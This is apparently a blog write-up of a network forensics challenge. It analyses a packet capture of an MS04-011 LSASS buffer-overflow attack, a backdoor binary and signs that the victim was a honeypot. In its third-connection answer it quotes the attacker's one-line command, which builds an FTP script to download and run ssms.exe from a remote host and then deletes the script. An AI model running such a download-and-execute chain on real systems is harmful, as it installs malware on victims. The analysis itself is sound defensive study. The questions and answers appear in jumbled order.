![]() I highly doubt an attacker would have been able to manually scan, exploit, enter 7 commands, download and execute a binary in that time. Automated, this happened in 16 seconds.Do you think this is a manual or an automated attack? Why? (2pts).By carving the binary out of the pcap and obtaining a sha1 hash of the file Virtual Total Reports it as being titled smss.exe with a variety of back door names. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts). ![]() ![]() I think its a honeypot because at quick glance the TTL values don’t match a Windows machine, this machine said it was Windows 2000 in the SMB header, but uses a Linux TTL value of 64. In an IP header different operating systems will provide different time to live values.Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts).MS04-011 LSASS DsRoleUpgradeDownlevelServer function.What specific vulnerability was attacked? (2pts).TCP Connection 5 – Binary is downloaded to victim machine.TCP Connection 4 – A user logs in via a FTP backdoor and requests a binary to be downloaded.TCP Connection 3 – The following code is ran “echo open 0.0.0.0 8884 > o&echo user 1 1 > o &echo get ssms.exe > o &echo quit > o &ftp -n -s:o &del /F /Q o &ssms.exe (&’s indicate line breaks).TCP Connection 2 – SMB Connection is established, attacker exploits LSASS with a buffer overflow.TCP Connection 1 – The attacker initiates and closes a TCP connection with the victim.Can you sketch an overview of the general actions performed by the attacker? (6pts).With some quick searching I found that this is exploit MS04-011 which exploits a vulnerable LSASS function aka. If we take a look at what’s going on we see that the attacker is sending DsRoleUpgradeDownlevelServer and following it with a buffer overflow. If you follow the TCP streams you’ll also note that this is the end of tcp steam 1. ![]() On packet 33 you can see a big list of 1’s and Wireshark reporting a “long frame”. SMB sends along some OS information when its setting up so if you look at packet 16 in the SMB header you can see Windows 2000.
0 Comments
Leave a Reply. |